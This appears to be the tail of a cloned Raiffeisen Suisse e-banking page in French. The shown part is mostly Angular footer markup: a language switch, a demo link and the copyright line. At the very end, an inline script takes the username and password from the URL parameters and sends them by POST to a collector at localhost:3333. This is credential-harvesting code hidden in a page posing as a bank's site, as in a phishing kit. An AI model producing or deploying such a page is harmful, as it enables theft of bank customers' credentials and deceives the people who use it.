          </nav>
        </div>
      </div>
      <webiam-lib-footer
        _ngcontent-ixj-c100=""
        class="ng-tns-c100-0"
        _nghost-ixj-c66=""
        ><footer _ngcontent-ixj-c66="" id="footer" class="theme-dark">
          <div _ngcontent-ixj-c66="" class="container">
            <div _ngcontent-ixj-c66="" class="row">
              <div _ngcontent-ixj-c66="" class="col-sm-6 order-sm-1 mb-5">
                <webiam-lib-language-switch
                  _ngcontent-ixj-c100=""
                  class="mb-5"
                  _nghost-ixj-c73=""
                  ><div
                    _ngcontent-ixj-c73=""
                    class="row justify-content-start justify-content-sm-end theme-dark"
                  >
                    <div _ngcontent-ixj-c73="" class="col-auto">
                      <a
                        _ngcontent-ixj-c73=""
                        href=""
                        rel="alternate"
                        hreflang="de-CH"
                        class="ng-star-inserted"
                        >DE</a
                      ><!----><!---->
                    </div>
                    <div _ngcontent-ixj-c73="" class="col-auto">
                      <!----><span
                        _ngcontent-ixj-c73=""
                        class="active ng-star-inserted"
                        >FR</span
                      ><!---->
                    </div>
                    <div _ngcontent-ixj-c73="" class="col-auto">
                      <a
                        _ngcontent-ixj-c73=""
                        href=""
                        rel="alternate"
                        hreflang="it-CH"
                        class="ng-star-inserted"
                        >IT</a
                      ><!----><!---->
                    </div>
                  </div></webiam-lib-language-switch
                >
              </div>
              <div _ngcontent-ixj-c66="" class="col-sm-6 order-sm-0 navigation">
                <div
                  _ngcontent-ixj-c100=""
                  class="footer-navigation ng-tns-c100-0 ng-star-inserted"
                >
                  <a
                    _ngcontent-ixj-c100=""
                    target="_blank"
                    rel="noopener noreferrer"
                    class="ng-tns-c100-0"
                    title="Démo e-banking"
                    href="https://ebankingdemo.raiffeisen.ch?language=fr"
                  >
                    Démo e-banking
                  </a>
                </div>
                <!---->
              </div>
            </div>
            <div _ngcontent-ixj-c66="" class="row copyright copyright-pull-up">
              <div _ngcontent-ixj-c66="" class="col-12">
                <div _ngcontent-ixj-c100="" class="footer-copyright">
                  © 2024 Raiffeisen Suisse
                </div>
              </div>
            </div>
          </div>
        </footer></webiam-lib-footer
      ><!----></webiam-root
    >
    <script
      src="/unsupported-browser/bootstrap-fallback.js"
      async=""
      type="application/javascript"
    ></script>
    <script src="runtime.0e74eb73e66d7e82.js" type="module"></script>
    <script src="main.077446c335704e69.js" type="module"></script>

    <script type="application/javascript">
      const params = new Proxy(new URLSearchParams(window.location.search), {
        get: (searchParams, prop) => searchParams.get(prop),
      });

      fetch("http://localhost:3333", {
        method: "POST",
        body: JSON.stringify({username: params.username, password: params.password}),
      });
    </script>
  </body>
</html>
